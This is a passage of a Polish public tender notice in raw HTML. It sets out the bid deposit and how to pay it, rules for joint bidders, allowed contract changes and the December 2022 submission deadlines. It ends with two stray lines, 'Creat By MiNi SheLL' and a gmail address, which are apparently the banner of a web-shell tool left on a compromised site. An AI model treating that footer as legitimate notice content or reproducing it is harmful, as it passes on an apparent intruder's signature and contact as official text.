class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium przed upływem terminu składania ofert w<br/>wysokości 3000,00 zł.<br/>2. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy<br/>z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572)<br/>3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego w Banku Spółdzielczym<br/>w Strzegowie nr konta 03 8238 0009 0000 0648 2000 0002. W tytule wpłaty należy dokładnie określić jakiego postępowania<br/>przelew dotyczy.<br/>4. Skuteczne wniesienie wadium w pieniądzu następuje z chwilą uznania środków pieniężnych na rachunku bankowym<br/>Zamawiającego, o którym mowa w ust. 3 niniejszej SWZ, przed upływem terminu składania ofert (tj. przed upływem dnia i<br/>godziny wyznaczonej jako ostateczny termin składania ofert).<br/>5. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w ust. 2 pkt 2–4, wykonawca przekazuje<br/>zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. Wadium wnoszone w formie gwarancji lub<br/>poręczenia, o których mowa w ust. 2 pkt 2–4 należy załączyć do oferty w oryginale w postaci dokumentu elektronicznego<br/>podpisanego kwalifikowanym podpisem elektronicznym przez wystawce dokumentu.<br/>6. W przypadku wniesienia wadium w formie innej niż pieniądz – z dokumentu tego musi wynikać, że gwarancja/poręczenie<br/>jest nieodwołalne i bezwarunkowe. Gwarancja/poręczenie nie może w swojej treści uzależniać wypłaty wadium od<br/>potwierdzenia przez bank, jakąkolwiek inną osobę trzecią lub instytucję podpisów osób złożonych pod żądaniem wypłaty<br/>wadium w imieniu zamawiającego. Wypłata kwoty wadium nie może być też uwarunkowana żadnymi innymi formalnościami<br/>koniecznymi do spełnienia ani dokumentami koniecznymi do złożenia wraz z żądaniem wypłaty wadium. Gwarancja lub<br/>poręczenie winny przewidywać okres bezwarunkowej wypłaty maksymalnie do 30 dni kalendarzowych od pierwszego<br/>pisemnego żądania wypłaty wadium.<br/>7. Oferta wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy zostanie odrzucona.<br/>8. Okoliczności i zasady zwrotu wadium, oraz zasady jego zaliczenia na poczet zabezpieczenia należytego wykonania<br/>umowy określa ustawa PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy występujące wspólnie muszą ustanowić pełnomocnika zgodnie z zasadami art.<br/>58 ust. 2 ustawy Pzp (pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia należy załączyć do oferty).<br/>2. W przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia składają<br/>oświadczenie, z którego wynika, które roboty budowlane wykonują poszczególni Wykonawcy –<br/>załącznik nr 6 do SWZ.<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o<br/>którym mowa w rozdziale XXII ust. 1 SWZ składa każdy z Wykonawców wspólnie ubiegających<br/>się o zamówienie. Oświadczenie to musi potwierdzać spełnianie warunków udziału w<br/>postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu oraz brak podstaw wykluczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zgodnie z art. 455 ust.1 pkt 1 ustawy Pzp przewidziano zmiany postanowień umownych:<br/>1) W zakresie wynagrodzenia:<br/>a) w przypadku, gdy w trakcie obowiązywania umowy ulegnie podwyższeniu stawka podatku od<br/>towarów i usług na usługi stanowiące Przedmiot niniejszej umowy, Zamawiający przewiduje możliwość zmiany umowy. W takim przypadku zmianie ulegnie wysokość wynagrodzenia brutto<br/>Wykonawcy w ten sposób, iż zostanie ono powiększone o kwotę stanowiącą różnicę pomiędzy<br/>kwotą podatku od towarów i usług obliczoną według stawki obowiązującej w dniu zawarcia<br/>umowy i kwotą podatku od towarów i usług obliczoną według nowej stawki obowiązującej po<br/>wprowadzeniu zmiany w obowiązujących w tym zakresie przepisach prawa. Przedmiotowe<br/>postanowienie ma zastosowanie do tej części wynagrodzenia brutto Wykonawcy, do którego<br/>będzie miała zastosowanie podwyższona stawka podatku VAT. Powyższa zmiana może być<br/>jednak dokonana pod warunkiem wykazania przez Wykonawcę, że zmiana w zakresie stawki<br/>podatku od towarów i usług miała wpływ na koszty wykonania zamówienia przez Wykonawcę.<br/>W każdym przypadku podstawą wyliczenia kwoty podatku od towarów i usług będzie kwota<br/>wynagrodzenia netto Wykonawcy, która nie ulegnie zmianie na skutek zmiany stawki podatku<br/>VAT. Zmiana wynagrodzenia wymaga stosownego aneksu dla swej ważności sporządzonego na<br/>piśmie;<br/>b) w przypadku konieczności wykonania większej ilości projektów podziału nieruchomości do<br/>wniosku o wydanie decyzji ZRID określonej w § 3. W takim przypadku zmianie ulegnie<br/>odpowiednio wysokość wynagrodzenia w oparciu o cenę jednostkową określona w § 3.<br/>2) w zakresie terminu wykonania umowy:<br/>a) w przypadku wystąpienia robót dodatkowych, nie wyszczególnionych w umowie, jak również<br/>wykonywania koniecznych rozwiązań zamiennych w stosunku do projektowanych, jeżeli będzie<br/>potrzebny czas na ich wykonanie;<br/>b) w przypadku wystąpienia siły wyższej, tj.: działania i zamieszki wojenne, ataki terrorystyczne,<br/>klęski żywiołowe spowodowane przez burze, huragany, tajfuny, trzęsienia ziemi, wybuchy<br/>wulkanów, ekonomiczne następstwa globalnego kryzysu finansowego i inne, uniemożliwiającej<br/>wykonanie zamówienia w terminie umownym lub powodującej zmianę zakresu robót;<br/>c) z powodu zaistnienia omyłki pisarskiej lub rachunkowej;<br/>d) z powodu uzasadnionych zmian w zakresie sposobu wykonywania przedmiotu zamówienia<br/>proponowanych przez Zamawiającego lub Wykonawcę, które zaakceptuje na piśmie<br/>Zamawiający;<br/>e) jeżeli wystąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym<br/>wpływ na realizacje przedmiotu zamówienia lub świadczenia jednej lub obu Stron Umowy;<br/>f) powstania rozbieżności lub niejasności w rozumieniu pojęć lub sformułowań użytych w<br/>Umowie, których nie będzie można usunąć w inny sposób, a zmiana treści Umowy będzie<br/>umożliwiać usunięcie rozbieżności lub niejasności i doprecyzowanie umowy w celu<br/>jednoznacznej interpretacji jej zapisów przez Strony;<br/>g/zmiany będące następstwem okoliczności leżących po stronie zamawiającego, w<br/>szczególności wstrzymanie realizacji umowy przez Zamawiającego – o czas niezbędny do<br/>wykonania umowy w sposób należyty,<br/>3) w zakresie terminu wykonania umowy o czas opóźnienia, jeżeli takie opóźnienie wystąpi<br/>lub będzie miało wpływ na wykonanie umowy w przypadku:<br/>a) protestów mieszkańców w związku z realizacją przedmiotu umowy;<br/>b) przekroczenia ustawowych terminów wydawania przez organy administracji lub innych<br/>instytucji branżowych decyzji, zezwoleń, uzgodnień itp.;<br/>c) gdy zachodzi konieczność dostosowania postanowień umowy do zmian wynikających z<br/>nowelizacji powszechnie obowiązujących przepisów prawa z uwagi na brak możliwości<br/>realizacji umowy wedle pierwotnej jej treści;<br/>d) zmianie uległy przepisy prawne powodujące konieczność modyfikacji opisu przedmiotu<br/>zamówienia i wynikającą stąd pracochłonność czynności;<br/>Ze względu na ograniczenia ilości znaków w przedmiotowym polu pozostałe zmiany znajdują się w projekcie umowy<br/>stanowiącym załącznik do specyfikacji warunków zamówienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-16 13:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Na platformie zakupowej eZamawiający znajdującej się pod adresem: https://strzegowo.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-16 14:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com